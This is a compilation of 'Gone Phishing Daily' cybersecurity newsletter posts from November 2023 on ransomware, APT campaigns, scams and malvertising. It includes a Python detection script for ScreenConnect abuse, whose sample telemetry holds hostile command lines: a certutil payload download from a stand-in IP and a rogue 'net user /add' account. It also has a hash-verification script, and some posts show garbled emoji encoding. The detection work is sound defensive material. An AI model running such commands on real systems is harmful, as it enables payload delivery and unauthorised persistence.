Gone Phishing Daily


Gone Phishing Daily: the cyber security newsletter that's on the FBI's most wanted list, a no-BS breakdown of the world of cyber security.

17/11/2023

🚨 Cybersecurity Alert: Attacks on File-Transfer Services Surge! 📂💻

🔒 In a wave of attacks over the course of this year, MOVEit Transfer, GoAnywhere MFT and IBM Aspera Faspex were all hit through flaws in the products themselves, with the Clop ransomware gang exploiting zero-day vulnerabilities in MOVEit and GoAnywhere to reach the organisations behind them. Five months on, the fallout is still unfolding, and it points to a worrying trend: managed file-transfer services have become a target in their own right.

🎯 Why Are They Targeted?

According to Jess Burn, principal analyst at Forrester, these services are an opportunistic attack vector because of the high-value data that passes through them. Where a phishing campaign yields credentials, a file-transfer server holds a "treasure trove" for threat actors: data to extort the victim with, or to use for corporate espionage.

💼 Who's at Risk?

Major financial institutions, education providers, government agencies, healthcare organisations, insurers and law firms are among the direct and indirect victims.

🔍 Vulnerability Spotlight:

Intel 471 has been tracking vulnerabilities in managed file-transfer products since 2018 and rates 51 of them as high risk. As these tools become more widespread, so does the number of flaws available for threat actors to exploit.

⚠️ Implicit Trust Issue:

Mauricio Sanchez of Dell'Oro Group warns of a false sense of security: handing corporate data to a third-party product for the duration of a transfer has consequences that are easy to underestimate.

🛡️ Staying Secure:

Stay vigilant, patch file-transfer products promptly and keep their admin interfaces off the open internet, and think about what data sits on them and for how long: a file that has finished transferring but is still on the server is exposure for no benefit. 💪🌍

👉 To read more phishy articles, please visit www.gonephishing.xyz and sign up to our newsletter to never miss a story!

๐Ÿ›๏ธ Stay Cyber-Safe this Shopping Season! ๐Ÿ›ก๏ธ As the shopping frenzy kicks in, it's not just the joy of discounts that's o...
17/11/2023

๐Ÿ›๏ธ Stay Cyber-Safe this Shopping Season! ๐Ÿ›ก๏ธ

As the shopping frenzy kicks in, it's not just the joy of discounts that's on the riseโ€”cybercriminals are gearing up too! ๐Ÿ’ป๐Ÿ‘พ Beware of credit card skimming, a growing threat lurking in the shadows of online stores.

๐Ÿšจ The Kritec Campaign Unveiled!

Keep an eye out for the Kritec campaign, a notorious credit card skimming operation we've been tracking since March 2023. ๐Ÿ•ต๏ธโ€โ™‚๏ธ With hundreds of stores compromised, this threat has resurged in October, just in time for the holiday season. ๐Ÿ˜ฑ

๐Ÿ›ก๏ธ Top Tips

๐Ÿ‘€ Inspect the Website: If it looks outdated or neglected, steer clear! ๐Ÿšซ

๐Ÿ›ก๏ธ Web Protection Tools: Use antivirus products with web protection to spot malicious domains and IPs.

๐ŸŒ Stay Updated:

Regularly update your website's CMS and plugins to avoid vulnerabilities.

๐Ÿ‘ฉโ€๐Ÿ’ป Malwarebytes to the Rescue!

For an extra layer of defence, consider Malwarebytes Premium with web protection and the Browser Guard extension for advanced in-browser detection.

Happy shopping, but safer shopping! 🎉🛒


16/11/2023

🚨 Major Cyber Disruption at DP World Australia! 🌍💻

DP World Australia, the local arm of the global logistics giant and handler of around 40% of Australia's container trade, suffered a severe cyberattack on November 10 that disrupted freight movements at its key ports. 🚢💔

🚨 Def Con 4 🚨

The company, with annual revenue exceeding $10 billion, activated its emergency plans and brought in cybersecurity specialists to handle the incident. It is now testing systems and gradually restoring services ahead of a return to normal operations.

Approximately 30,000 containers, including time-sensitive goods such as blood plasma and premium food items, have been stranded since the attack. Damage estimates run into the millions.

🕵️ Internal Affairs 🕵️

Data access and theft are a live concern: an internal investigation is ongoing, and DP World is working with the Office of the Australian Information Commissioner to assess any impact on personal information.

So far, no ransomware group has claimed responsibility and the company has not commented on whether data was stolen. Stay tuned for updates on this developing situation. 🔄🔍🚀


๐Ÿ” Moneris Successfully Thwarts Ransomware Attack!Great news, folks! Moneris, a tech company backed by Canada's top banks...
16/11/2023

๐Ÿ” Moneris Successfully Thwarts Ransomware Attack!

Great news, folks! Moneris, a tech company backed by Canada's top banks, has successfully fended off a recent ransomware attack! ๐Ÿ›ก๏ธ๐Ÿ’ป

๐Ÿ Enter Medusa ๐Ÿ

Toronto-based Moneris, a joint venture of the Royal Bank of Canada and Bank of Montreal, reported a cyber intrusion by the Medusa ransomware gang. However, Moneris's cybersecurity team swiftly sprang into action, preventing access to critical data without any ransom demand. ๐Ÿšซ๐Ÿ’ฐ

๐Ÿ˜Œ Disaster averted ๐Ÿ˜Œ

Despite attempts to breach their networks, Moneris reassures us that their robust security measures were not compromised. The company, which handles transactions at over 325,000 merchant locations across Canada, remains dedicated to safeguarding customer data. ๐Ÿ‘

๐Ÿ˜ค Moneris donโ€™t play ๐Ÿ’ช

While details about the attack's timing remain undisclosed, Moneris emphasises its commitment to customer protection and swift response to cyber threats. The Medusa gang, notorious for high-profile attacks, targeted Moneris but was met with resilient cybersecurity practices, according to the bank. ๐ŸŒ๐Ÿ›‘

Itโ€™s worth noting that Moneris has been asked several times whether they paid the $6 million ransom and has refused to answer on all occasions. ๐Ÿ˜ฌ

Ransomware gangs are increasingly targeting financial infrastructure globally, with the recent LockBit attack on the Industrial and Commercial Bank of China causing disruptions in the U.S. Treasury market. Let's stay vigilant and cyber-secure, folks! ๐ŸŒ๐Ÿ”’๐Ÿš€


๐Ÿฅ Hackers Targeting U.S. Healthcare Orgs Using ScreenConnect! ๐Ÿคฏ๐Ÿ”’ Security researchers uncover a concerning trend as thre...
15/11/2023

๐Ÿฅ Hackers Targeting U.S. Healthcare Orgs Using ScreenConnect! ๐Ÿคฏ

๐Ÿ”’ Security researchers uncover a concerning trend as threat actors exploit ScreenConnect, a remote access tool, to target healthcare organisations, including Transaction Data Systems (TDS).

๐ŸŒ Who's Affected:

TDS, a pharmacy supply chain solution in all 50 states, faces attacks on local ScreenConnect instances. Managed security platform Huntress identifies attacks on two healthcare organisations, indicating ongoing reconnaissance for potential escalation.

โš ๏ธ Attack Details:

Between Oct 28 and Nov 8, 2023, hackers employ consistent tactics, downloading a payload named text.xml. This file loads Metasploit attack payload Meterpreter into system memory, evading detection using non-PowerShell methods.

๐Ÿ’ป Compromised Endpoints:

Windows Server 2019 systems of a pharmaceutical and healthcare organisation, both linked by ScreenConnect instances. The tool instals additional payloads, executes commands, transfers files, and attempts to create new user accounts for persistent access.
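One way to hunt for this pattern in your own telemetry, as an added example that is not Huntress's or the newsletter's code: the function below runs over process-creation records (the fields that Sysmon Event ID 1 or Windows Security event 4688 supply) and flags anything spawned under the ScreenConnect client service, rating local account creation and remote payload fetches highest. Because it keys on the parent process rather than on PowerShell, the "non-PowerShell" tradecraft described above does not evade it. The ScreenConnect executable names are the real ones, although a rebranded on-prem deployment may use others; the sample events, hostnames, user names and URL are constructed.

```python
"""Flag suspicious child processes of the ScreenConnect client on Windows hosts.

Added example, not code from Huntress or the newsletter. Runs over
process-creation records (Sysmon EID 1 / Security 4688 fields). The sample
events at the bottom are constructed; the ScreenConnect executable names are
real, but a rebranded on-prem deployment may use other names (assumption:
add them to SCREENCONNECT_PARENTS).
"""
import re

SCREENCONNECT_PARENTS = {
    "screenconnect.clientservice.exe",
    "screenconnect.windowsclient.exe",
}

# Account creation or elevation: the persistence step the report describes.
ACCOUNT_CREATE_RE = re.compile(
    r"\bnet1?(?:\.exe)?\s+(?:user\s+\S+\s+\S+\s+/add|localgroup\s+administrators\s+\S+\s+/add)"
    r"|new-localuser|add-localgroupmember",
    re.I,
)
# Fetching a remote file with built-in tools (no PowerShell needed).
DOWNLOAD_RE = re.compile(
    r"certutil(?:\.exe)?\s+.*-urlcache|bitsadmin(?:\.exe)?\s+/transfer|curl(?:\.exe)?\s+"
    r"|invoke-webrequest|downloadstring|downloadfile|https?://\S+",
    re.I,
)
# Living-off-the-land binaries that a help-desk session rarely needs.
LOLBIN_RE = re.compile(
    r"\b(?:rundll32|regsvr32|mshta|msiexec|wscript|cscript|installutil|msbuild)(?:\.exe)?\b",
    re.I,
)


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return (severity, reason) for a process-creation event, or None."""
    parent = _basename(event.get("ParentImage", ""))
    if parent not in SCREENCONNECT_PARENTS:
        return None
    child = _basename(event.get("Image", ""))
    cmd = event.get("CommandLine", "")
    if ACCOUNT_CREATE_RE.search(cmd):
        return "high", f"{child} created/elevated a local account: {cmd}"
    if DOWNLOAD_RE.search(cmd):
        return "high", f"{child} fetched a remote payload: {cmd}"
    if LOLBIN_RE.search(child) or LOLBIN_RE.search(cmd):
        return "medium", f"LOLBin launched from ScreenConnect: {cmd}"
    return "low", f"{child} spawned from ScreenConnect: {cmd}"


def hunt(events):
    """Return [(computer, severity, reason)] for every event worth a look."""
    hits = []
    for event in events:
        verdict = classify(event)
        if verdict:
            hits.append((event.get("Computer", "?"), verdict[0], verdict[1]))
    return hits


# Constructed sample telemetry (hostnames, users, paths and URL are made up).
SC_PARENT = r"C:\Program Files (x86)\ScreenConnect Client (abc)\ScreenConnect.ClientService.exe"
SAMPLE_EVENTS = [
    {"Computer": "WS01", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe"},
    {"Computer": "SRV-RX1", "ParentImage": SC_PARENT,
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c certutil -urlcache -split -f http://203.0.113.7/text.xml C:\Windows\Temp\text.xml"},
    {"Computer": "SRV-RX1", "ParentImage": SC_PARENT,
     "Image": r"C:\Windows\System32\net.exe",
     "CommandLine": "net user svc_backup P@ssw0rd! /add"},
    {"Computer": "SRV-RX1", "ParentImage": SC_PARENT,
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c ipconfig /all"},
    {"Computer": "SRV-RX2", "ParentImage": SC_PARENT,
     "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Windows\Temp\x.dll,Start"},
]

if __name__ == "__main__":
    for computer, severity, reason in hunt(SAMPLE_EVENTS):
        print(f"[{severity}] {computer}: {reason}")
```

The "low" tier is intentionally noisy: a legitimate technician running ipconfig through ScreenConnect looks identical to an attacker doing reconnaissance, so correlate those hits with who was logged into the ScreenConnect server at the time and from where. The high-severity rules, account creation and payload fetches, are rarely part of a support session and are worth an alert on their own.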

🔗 Connection to TDS:

The ScreenConnect instance was tied to the domain 'rs.tdsclinical[.]com', which is associated with TDS. It is unclear whether TDS itself was breached, whether its credentials were compromised, or whether some other weakness was exploited.

🚨 Urgent Action Needed:

Huntress's attempts to notify TDS (now 'Outcomes', following a merger last summer) have gone unanswered. Healthcare entities are urged to stay vigilant, review who can reach their remote-access tooling, and share what they see so others can act on it. 🤝💊🔒


15/11/2023

🚨 Hackers Run Crypto Scam Using Google Forms! 💰

🔍 Researchers warn of rising crypto spam! Scammers are abusing the "Release scores" feature of Google Forms quizzes to deliver their emails, tricking victims into bogus crypto investments or into handing over personal details.

👩‍💻 How it Works:

The spammer creates a quiz in Google Forms and submits a response to it using the victim's email address as the respondent. They then click "Release scores", and Google emails the "results", with the scammer's text inside, from Google's own mail infrastructure. Because the message genuinely comes from Google, it sails past reputation-based filtering and lands in the inbox.

👀 Sample Scam:

Subject: "Score released: Balance 1.3320 BTC." Clicking through leads to a fake form that asks the victim to confirm their email address.

Victims are then sent to an external site and urged to "activate" an account supposedly holding Bitcoin worth $46,000. A live chat operator keeps it convincing. The final step: pay a '0.25%' exchange fee, about $64, via a QR code.

🎯 Google Features Targeted:

This follows Google's own warning that threat actors are abusing its Calendar service: a tool called Google Calendar RAT uses event descriptions as a covert command-and-control channel.

🛡️ Stay Informed:

As scams evolve, organisations should keep their indicators of compromise current and block the malicious domains involved; a genuine Google sender address is not, on its own, a reason to trust a message. 🚫 Be cautious, spread awareness and protect yourself from cunning cybercriminals! 🌍


15/11/2023

💔 Heartbreaking Story: 74-Year-Old Linda Bemis Falls Victim to Love Scam 😢

Linda thought she had found love online with "Mr Bravo", who claimed to be a military serviceman. As the relationship grew, Mr Bravo asked for larger and larger sums of money, and Bemis ended up selling her share of her home and her car, handing over $60,000 in total! 😱

🕵️‍♂️ Shocking Twist:

Mr Bravo is Lisa Miller! 😱 Miller, who claims she is innocent, had routed her internet connection through Nigeria to disguise where she really was. Arrested on fraud and theft charges, she now faces serious penalties. 😡

🏠 Homeless and Heartbroken:

Bemis warns, "Be careful! Before you know it, you can become a victim just like that." 💔

👮‍♂️ Police Caution:

Sergeant Brian Schnell urges vigilance. Scammers are out there, so protect yourself and your loved ones! 🛡️

🔗 Stay Informed:

Update as of November 10: Lisa Miller has been found guilty and is awaiting sentencing. Justice prevails! ⚖️

Let's spread awareness and stop scams together! Share this cautionary tale with your friends and family. 🤝


๐ŸŒ Cybersecurity Alert: Iranian-Linked Group Strikes in the Middle East! ๐ŸšจIn October 2023, a group tied to Iran intensifi...
14/11/2023

๐ŸŒ Cybersecurity Alert: Iranian-Linked Group Strikes in the Middle East! ๐Ÿšจ

In October 2023, a group tied to Iran intensified cyber attacks on transportation, logistics, and technology sectors in the Middle East, including Israel, amid heightened cyber activity since the Israel-Hamas war onset. ๐Ÿ’ป

Attributed by CrowdStrike to threat actor Imperial Kitten (aka Crimson Sandstorm, TA456, Tortoiseshell, Yellow Liderc), the attacks, ongoing since 2017, fulfil Iranian strategic intelligence needs linked to IRGC operations. Social engineering, job recruitment-themed content, and custom .NET-based implants characterise their modus operandi.

๐ŸŽฃ Iranโ€™s Gone Phishing ๐Ÿ‘€

Attack chains utilise compromised Israeli-related websites for profiling visitors using bespoke JavaScript. Tactics include watering hole attacks, one-day exploits, stolen credentials, phishing, and targeting IT service providers. ๐ŸŒ๐ŸŽฃ

Phishing campaigns leverage macro-laced Excel docs to deploy a Python-based reverse shell, while post-exploitation involves lateral movement via tools like PAExec and NetScan.

๐Ÿ€ I smell a RAT ๐Ÿ‘€

Remote access trojans (RATs) use Discord for command-and-control, with malware like IMAPLoader persisting as a Windows Service named Keyboard Service.

Microsoft notes Iranian cyber activity post-war as reactive and opportunistic, emphasising propaganda efforts. In parallel, revelations reveal a Hamas-affiliated threat actor, Arid Viper, targeting Arabic speakers with Android spyware SpyC23.

Stay vigilant against evolving cyber threats, folks! ๐Ÿ›ก๏ธ๐Ÿ’ป Until next time โœŒ


14/11/2023

🚀 Sandworm's Cyber Siege on Ukraine! Power Grid Hit in Multi-Event Attack! ⚡

Last year the notorious Russian hacking group Sandworm turned its digital arsenal on a critical Ukrainian electrical substation, causing a significant power outage in October 2022. 💻

Google's Mandiant describes the assault as a "multi-event cyber attack" in which Sandworm used novel techniques to manipulate industrial control systems (ICS). The initial strike relied on OT-level living-off-the-land (LotL) methods, meaning the attackers drove the substation's own SCADA software rather than dropping custom ICS malware, and it coincided with widespread missile strikes on Ukraine's critical infrastructure. 😱💡

🎸 Enter Sandworm 🤘

In a cunning follow-up, Sandworm deployed a new variant of the CaddyWiper data wiper in the victim's IT environment, adding another layer to the attack. 🌀💥

Key details such as the location, the duration of the blackout and the number of people affected have not been disclosed. Sandworm's disruption of Ukraine's power grid dates back to 2015 and has involved malware such as Industroyer. 🕵️‍♂️🔌

🎶 Let's get cyber-physical, physical 💀

The initial access vector for the cyber-physical attack is unknown, but the intrusion probably began around June 2022. Sandworm reached the operational technology (OT) environment through a hypervisor hosting the supervisory control and data acquisition (SCADA) management instance.

On October 10, 2022, an optical disc image (ISO) loaded with malware was used to trigger an unscheduled power outage. ⚡📀

The attack coincided with a wave of missile strikes, underscoring the immediate threat Sandworm poses to Ukrainian critical infrastructure. Mandiant urges asset owners worldwide who run MicroSCADA products to harden their defences against Sandworm's evolving tactics. 🛡️🌍


14/11/2023

🚨 Cybersecurity Alert: Sapphire Sleet Unleashes New Tactics! 🚨

🌍 Brace yourselves for a cybersecurity showdown! Sapphire Sleet, a sub-cluster of the notorious Lazarus Group, has upped the ante with a fresh strategy.

It has set up fake skills-assessment portals as the lure in its latest social engineering campaigns. This shift in tactics, identified by Microsoft, deserves our attention. 🕵️‍♂️

🦎 Karma, karma, karma, karma, karma chameleon 👀

👾 Operating under aliases such as APT38, BlueNoroff, CageyChameleon and CryptoCore, Sapphire Sleet specialises in cryptocurrency theft through cunning social engineering. Its track record speaks volumes. 🛡️

🍏 Recent findings by Jamf Threat Labs tie Sapphire Sleet to a new macOS malware named ObjCShellz, a late-stage payload that works hand in hand with another macOS threat, RustBucket.

😡 Bloody jobsworths! 🤓

💼 Targeting professional platforms such as LinkedIn, Sapphire Sleet baits victims with the promise of a skills assessment. Microsoft's Threat Intelligence team says that once a target engages, the conversation is quietly moved to other platforms, which complicates detection.

🔍 To stay ahead of defenders, Sapphire Sleet has expanded its network of malicious websites. Targets are instructed by the fake "recruiters" to register on these sites, which are password-protected to impede analysis.

🚫 Stay vigilant! Treat unsolicited recruitment approaches and skills-assessment portals with caution. Keep your cybersecurity shields up, and let's stay one step ahead of Sapphire Sleet! 💻🛡️


12/11/2023

US Government Launches "Shields Ready" Campaign for Cyber Resilience 🛡️

The US government is stepping up its game on critical national infrastructure (CNI) cyber-resilience with the launch of the "Shields Ready" campaign, designed to complement the highly successful "Shields Up" initiative.

🛡️ Shields Up or Shields Ready? 😂

While "Shields Up" aimed to prepare everyone for cyberattacks, "Shields Ready" focuses squarely on improving CNI processes and hardening systems in anticipation of incidents. 🔒

🔑 Key Messages for CNI Providers

Jointly launched by the US Cybersecurity and Infrastructure Security Agency (CISA), the Department of Homeland Security (DHS) and the Federal Emergency Management Agency (FEMA), "Shields Ready" conveys four key messages to CNI providers:

Understand Infrastructure & Dependencies 👷‍♂️: Identify critical operational systems and their interdependencies with other infrastructure.

Comprehensive Risk Assessments 🚨: Evaluate the broad spectrum of threats that could disrupt CNI and assess specific vulnerabilities.

Make Actionable Plans 📋: Develop strategic risk management plans to reduce risks and vulnerabilities, and incident response and recovery plans to minimise downtime.

Measure Progress & Improve 📈: Continuously improve readiness by exercising incident response plans under realistic conditions, and regularly update and re-evaluate strategic plans.

Jen Easterly, CISA director, stressed the need to equip CNI entities, including hospitals, schools and water facilities, with the resources to respond to disruptions. The campaign aims to strengthen the resilience of the infrastructure Americans rely on every day. 💪🌍

Preparation today ensures readiness for tomorrow's threats. Stay vigilant and resilient! 🏗️👀🔍 Cheers cyber squad, and thanks for reading our 200th edition.


12/11/2023

🦠 Malvertising Alert: Cybercriminals Mimic Windows News Portal to Spread Malware 🦠

A malvertising campaign has emerged in which cybercriminals imitate a legitimate Windows news portal to distribute malware. The real portal attracts software enthusiasts and system administrators looking for hardware reviews and software utilities. 🖥️

👀 What's Going On? 👀

The threat actors trade on the portal's credibility to promote a malicious installer for the widely used CPU-Z processor tool.

They use cloaking: visitors who don't look like intended targets (security crawlers, for instance) are sent to an innocuous blog page, while real victims are redirected to a download page hosting a digitally signed MSIX installer built to evade detection.

When the user runs the installer, a malicious PowerShell loader known as FakeBat fires, downloading the RedLine Stealer onto the victim's system.

🌍 A Broader Campaign Unveiled 🌍

The researchers suspect this incident is part of a larger malvertising campaign that also targets other utilities, including Notepad++, Citrix and VNC Viewer. 🕵️

🔮 Recent Trickery Trends 📈

Alongside this, a surge in fake browser-update campaigns has been spreading Cobalt Strike, loaders and stealers. These campaigns trick users into downloading malware through visual deception and watering-hole techniques. 🌊

🕵️ Stay Vigilant 🔎

Impersonating popular software remains a favourite tactic. To stay safe, organisations can verify downloaded files against the SHA256 hash sums published on the vendor's own website (not the page the download came from), and keep an eye on Indicators of Compromise (IoCs), including malicious domains and payload URLs, to understand attack patterns. 🛡️💡
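For the hash check, here is an added example in Python (it is not the newsletter's or any vendor's code). It streams the downloaded file through SHA256, parses a sha256sum-style checksum list of the kind many vendors publish, compares in constant time, and refuses files that are not listed at all rather than quietly passing them. The file contents and the checksum text in demo() are constructed so it runs offline; a real check must fetch the list from the vendor's own site over HTTPS, never from the page that served the download.

```python
"""Verify a downloaded installer against a vendor-published SHA256 checksum list.

Added example, not the newsletter's or any vendor's code. The file and the
checksum text in demo() are constructed so it runs offline; in practice the
checksum list is fetched from the vendor's own site over HTTPS, never from
the page that served the download.
"""
import hashlib
import hmac
import os
import tempfile

HEX_DIGITS = set("0123456789abcdef")


def sha256_file(path, chunk_size=1 << 20):
    """Hash the file in chunks so multi-gigabyte installers need not fit in RAM."""
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def parse_checksums(text):
    """Parse sha256sum-style lines ("<hex>  <filename>") into {filename: hex}.

    Anything that is not a 64-hex-digit digest is ignored rather than trusted:
    if the site was spoofed, the checksum text is attacker-controlled too.
    """
    table = {}
    for line in text.splitlines():
        parts = line.strip().split(None, 1)
        if len(parts) != 2:
            continue
        digest, name = parts
        digest = digest.lower()
        name = name.lstrip("*")  # sha256sum marks binary mode with a leading '*'
        if len(digest) == 64 and set(digest) <= HEX_DIGITS:
            table[os.path.basename(name)] = digest
    return table


def verify_download(path, checksum_text):
    """Return (ok, message); ok is False for an unlisted file or a mismatch."""
    name = os.path.basename(path)
    expected = parse_checksums(checksum_text).get(name)
    if expected is None:
        return False, f"{name} is not listed in the vendor checksum file"
    actual = sha256_file(path)
    if hmac.compare_digest(actual, expected):
        return True, "SHA256 matches the vendor-published value"
    return False, f"SHA256 mismatch: got {actual}, vendor lists {expected}"


def demo():
    """Constructed scenario: a genuine installer, then a tampered copy under the same name."""
    with tempfile.TemporaryDirectory() as workdir:
        installer = os.path.join(workdir, "tool-setup.msix")
        with open(installer, "wb") as f:
            f.write(b"genuine installer bytes")
        vendor_list = f"{sha256_file(installer)} *tool-setup.msix\n"
        ok_genuine, _ = verify_download(installer, vendor_list)
        with open(installer, "wb") as f:
            f.write(b"genuine installer bytes + bundled loader")
        ok_tampered, message = verify_download(installer, vendor_list)
        return ok_genuine, ok_tampered, message


if __name__ == "__main__":
    print(demo())
```

A valid code signature on an MSIX, as in the campaign above, says only that someone with a certificate signed it; it does not say the file is the one the vendor ships. Comparing against the vendor's published digest catches the swapped installer that a signature check alone would wave through.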

Vigilance and caution remain key in the ongoing battle against cyber threats. Stay informed and stay secure! 🔒👀🔍


12/11/2023

Defending ChatGPT: OpenAI Fights DDoS Attacks 🛡️

OpenAI, the developer behind ChatGPT, recently weathered a relentless series of distributed denial of service (DDoS) attacks that caused intermittent outages. Here's the scoop on what happened and why it matters. 🚀

🔌 Attack Alert: ChatGPT in Peril 🚨

On November 8, ChatGPT and its API suffered "periodic outages" that OpenAI attributed to an abnormal traffic pattern consistent with a DDoS attack. OpenAI worked to mitigate the traffic and get ChatGPT back on track. 📆

🤖 Hacktivist Havoc 🌍

Anonymous Sudan, a hacktivist group, claimed responsibility for the attacks. Its stated motives: allegations that OpenAI supports Israel, and concerns about ChatGPT's potential role in oppressive actions. 🌍

🚀 AI in Conflict and Espionage 🌍

Anonymous Sudan also raised questions about AI's use in weaponry and intelligence, emphasising its impact on global conflicts. 🌍

🔍 Strengthening Cyber Defences 🛡️

Security experts advise continuously tuning DDoS mitigation services to keep pace with attackers' evolving tactics. OpenAI's prominence in the tech industry makes it a standing target. 🚀

In a world full of uncertainties, safeguarding network integrity remains paramount. Stay tuned for updates as OpenAI's battle against DDoS attacks unfolds. 🔒🌍😮


๐Ÿ›ก๏ธ New Malware Linked to BlueNoroff APT Group Uncovered ๐Ÿš€๐Ÿ•ต๏ธโ€โ™‚๏ธ Security researchers have unearthed a fresh malware varia...
11/11/2023

๐Ÿ›ก๏ธ New Malware Linked to BlueNoroff APT Group Uncovered ๐Ÿš€

๐Ÿ•ต๏ธโ€โ™‚๏ธ Security researchers have unearthed a fresh malware variant believed to be associated with the financially motivated BlueNoroff Advanced Persistent Threat (APT) group. BlueNoroff often targets cryptocurrency exchanges, venture capital firms, and banks in its campaigns.

๐Ÿ‘พ Threat Hunting ๐Ÿน๐Ÿ‘พ๐ŸŒฒ

๐Ÿ”Ž Discovered during routine threat hunting, the malware, named "ObjCShellz," stands out due to its interaction with a known malicious domain. What's concerning is that a legitimate cryptocurrency exchange also operates under a similar domain, raising red flags.

๐Ÿš— Rustbucket returns ๐Ÿš—

๐Ÿ‘ฅ BlueNoroff's Rustbucket campaign involves disguising as investors or headhunters to infiltrate targets, aligning with the latest discovery. The malware executes remote shell commands, providing attackers with control over compromised systems.

๐ŸŽญ Online again off again ๐ŸŽญ

๐Ÿ“… The malicious domain, registered in May 2023, eventually went offline after analysis. While the initial access method remains unclear, the malware likely serves as a late-stage tool in multi-stage attacks.

Stay vigilant as cybersecurity researchers continue to uncover threats from this APT group. ๐Ÿ”’๐Ÿฆ 


11/11/2023

🚀 Visa Launches Cybersecurity Training Program 🎓

Visa has unveiled a payments learning program to address the growing need for skilled cybersecurity professionals.

The program will offer online courses and certifications to equip workers, students and military personnel with vital cybersecurity skills, with the aim of building a diverse talent pool.

Initially focused on payment cybersecurity, Visa's move aligns with the White House National Cybersecurity Strategy Implementation Plan's call to foster cybersecurity careers...

👉 To continue reading, please visit www.gonephishing.xyz and sign up to our newsletter to never miss a story!

11/11/2023

👾 Meet Farnetwork: The Ransomware Prodigy! 👾

🔍 In the latest scoop from the cybersecurity world, researchers have profiled a prolific threat actor known as Farnetwork. This cybercriminal has been active for the past four years and has played a key role in five different ransomware-as-a-service (RaaS) programs. 😱

🕵️‍♂️ Getting to Know the Villain 🕵️‍♂️

Singapore-based Group-IB managed to peek behind the curtain of the Nokoyawa RaaS.

Its researchers even sat a "job interview" with Farnetwork! The exercise uncovered Farnetwork's history, which began in 2019.

Farnetwork worked on ransomware projects including JSWORM, Nefilim, Karma and Nemty before launching a RaaS program built on the Nokoyawa ransomware. 😈

💼 Cybercriminal history 💼

Farnetwork goes by many aliases on underground forums, including Farnetworkit and Jingo, and initially offered a remote access trojan called RazvRAT.

🌍 Broadening Horizons 🌍

In 2022, Farnetwork shifted focus to Nokoyawa and set up a botnet service that gave affiliates access to already-compromised corporate networks. The operation recruited affiliates to deploy the ransomware using stolen credentials and extort the victims.

💸 The RaaS Game 💸

Affiliates get 65% of each ransom, Farnetwork takes 20% and the ransomware developer gets 15%. This arrangement streamlines the operation but leaves affiliates with a smaller cut than usual.

👀 What's Next? 👀

Although Nokoyawa ceased operations in October 2023, don't be surprised if Farnetwork re-emerges under a different name with a new RaaS program. According to the researchers, Farnetwork is one of the most active players in the RaaS market.

Stay vigilant, stay safe, and watch out for the next cyber thriller! 🛡️👀🌍


10/11/2023

🚨 Data Breach Alert: 5 Canadian Hospitals Hit by Ransomware 🏥

😱 In a major security breach, patient and employee data from five Canadian hospitals has been stolen and leaked online following a ransomware attack.

🏨 Hospitals Impacted:

Bluewater Health

Chatham-Kent Health Alliance

Erie Shores HealthCare

Hôtel-Dieu Grace Healthcare

Windsor Regional Hospital

Plus their shared service provider, TransForm Shared Service Organization

📂 Shared Drive Compromised...

👉 To continue reading, please visit www.gonephishing.xyz and sign up to our newsletter to never miss a story!

10/11/2023

🚨 North Korea's BlueNoroff Unleashes macOS Malware: ObjCShellz Strikes 🖥️💣

BlueNoroff, also known as APT38 among other names and linked to North Korea, is behind a new macOS malware named ObjCShellz.

🧐 What You Need to Know:

Part of the RustBucket malware campaign 💼

Likely delivered via social engineering 🤯

Used in multi-stage attacks 💥

🕵️‍♀️ How It Works:

ObjCShellz, written in Objective-C, is a simple remote shell that executes commands sent from an attacker-controlled server. 🐚

🎯 Potential Targets:

The malware is believed to target companies in the cryptocurrency industry or closely related to it. ₿

🚀 Cyber Threats Evolve:

North Korean state-sponsored groups such as Lazarus, to which BlueNoroff is linked, constantly evolve and share tactics and tools. 🌍

🚫 Stay Vigilant:

It's simple malware, but highly functional. Keep your security tooling updated! 💪

Expect more macOS malware campaigns as these threat actors adapt and extend their reach. 🌟🚫🦠


10/11/2023

🚨 New Jupyter Infostealer Malware Resurfaces with Tricky Tactics 🦠

The Jupyter Infostealer, also known as Polazert, SolarMarker and Yellow Cockatoo, is back with "simple yet impactful changes". 💻 Researchers from VMware Carbon Black have documented the malware's latest tactics.

🌍 Initial Access: Jupyter lures users with SEO poisoning and malvertising into downloading it from dubious websites. 🌍

🔍 What Does It Do?

Harvests credentials 🤖

Establishes encrypted command-and-control communication 🔒

Executes arbitrary commands ⚙️

📜 Latest Updates:

The malware now signs its installers with certificates to look legitimate, but it's a disguise! Fake installers kick off the infection chain, reaching out to a remote server via PowerShell. 😱

🌌 Evolving Threats:

Other malware, such as Lumma Stealer and Mystic Stealer, has been updated with loader functionality for more damaging follow-on attacks, including ransomware. 😈

🔄 Constant Evolution:

Jupyter Infostealer has updated its network communications and grown in popularity among cybercriminals. It now uses its loader capability to distribute other malware, including RedLine, DarkGate and GCleaner. 📈

👾 More Malware:

Keep an eye out for Akira Stealer and Millenium RAT, both equipped with a range of data-theft features. The world of cyber threats never stands still! 🌎

🤖 Proxy Botnet Alert:

PrivateLoader and Amadey have infected thousands of devices with a proxy botnet called Socks5Systemz. 🧦 The botnet turns infected machines into proxies that are rented out for anonymity. 💰

🌍 Where Are the Threat Actors?

The actors behind these attacks may be Russian, given the conspicuous absence of infections in that country. 🐻‍❄️

Stay safe online! 💪 Update your security tools and stay vigilant. 💡


09/11/2023

🚨 U.S. Treasury Sanctions Russian Woman for Money Laundering 🚨

The U.S. Department of the Treasury has sanctioned Ekaterina Zhdanova, a Russian national, for laundering virtual currency on behalf of Russia's elites and cybercriminal groups, including the notorious Ryuk ransomware gang. 💰

🌍 Zhdanova is accused of facilitating large cross-border transactions that help Russian individuals access Western financial markets and evade international sanctions. She uses entities that lack Anti-Money Laundering/Combating the Financing of Terrorism (AML/CFT) controls, such as the OFAC-designated Russian crypto exchange Garantex Europe OU (Garantex). 💼

💸 To move funds internationally, Zhdanova relies on a mix of methods, including cash and a network of international money-laundering associates and organisations. Garantex itself was sanctioned in April 2022, alongside the takedown of the dark web marketplace Hydra. 🔒

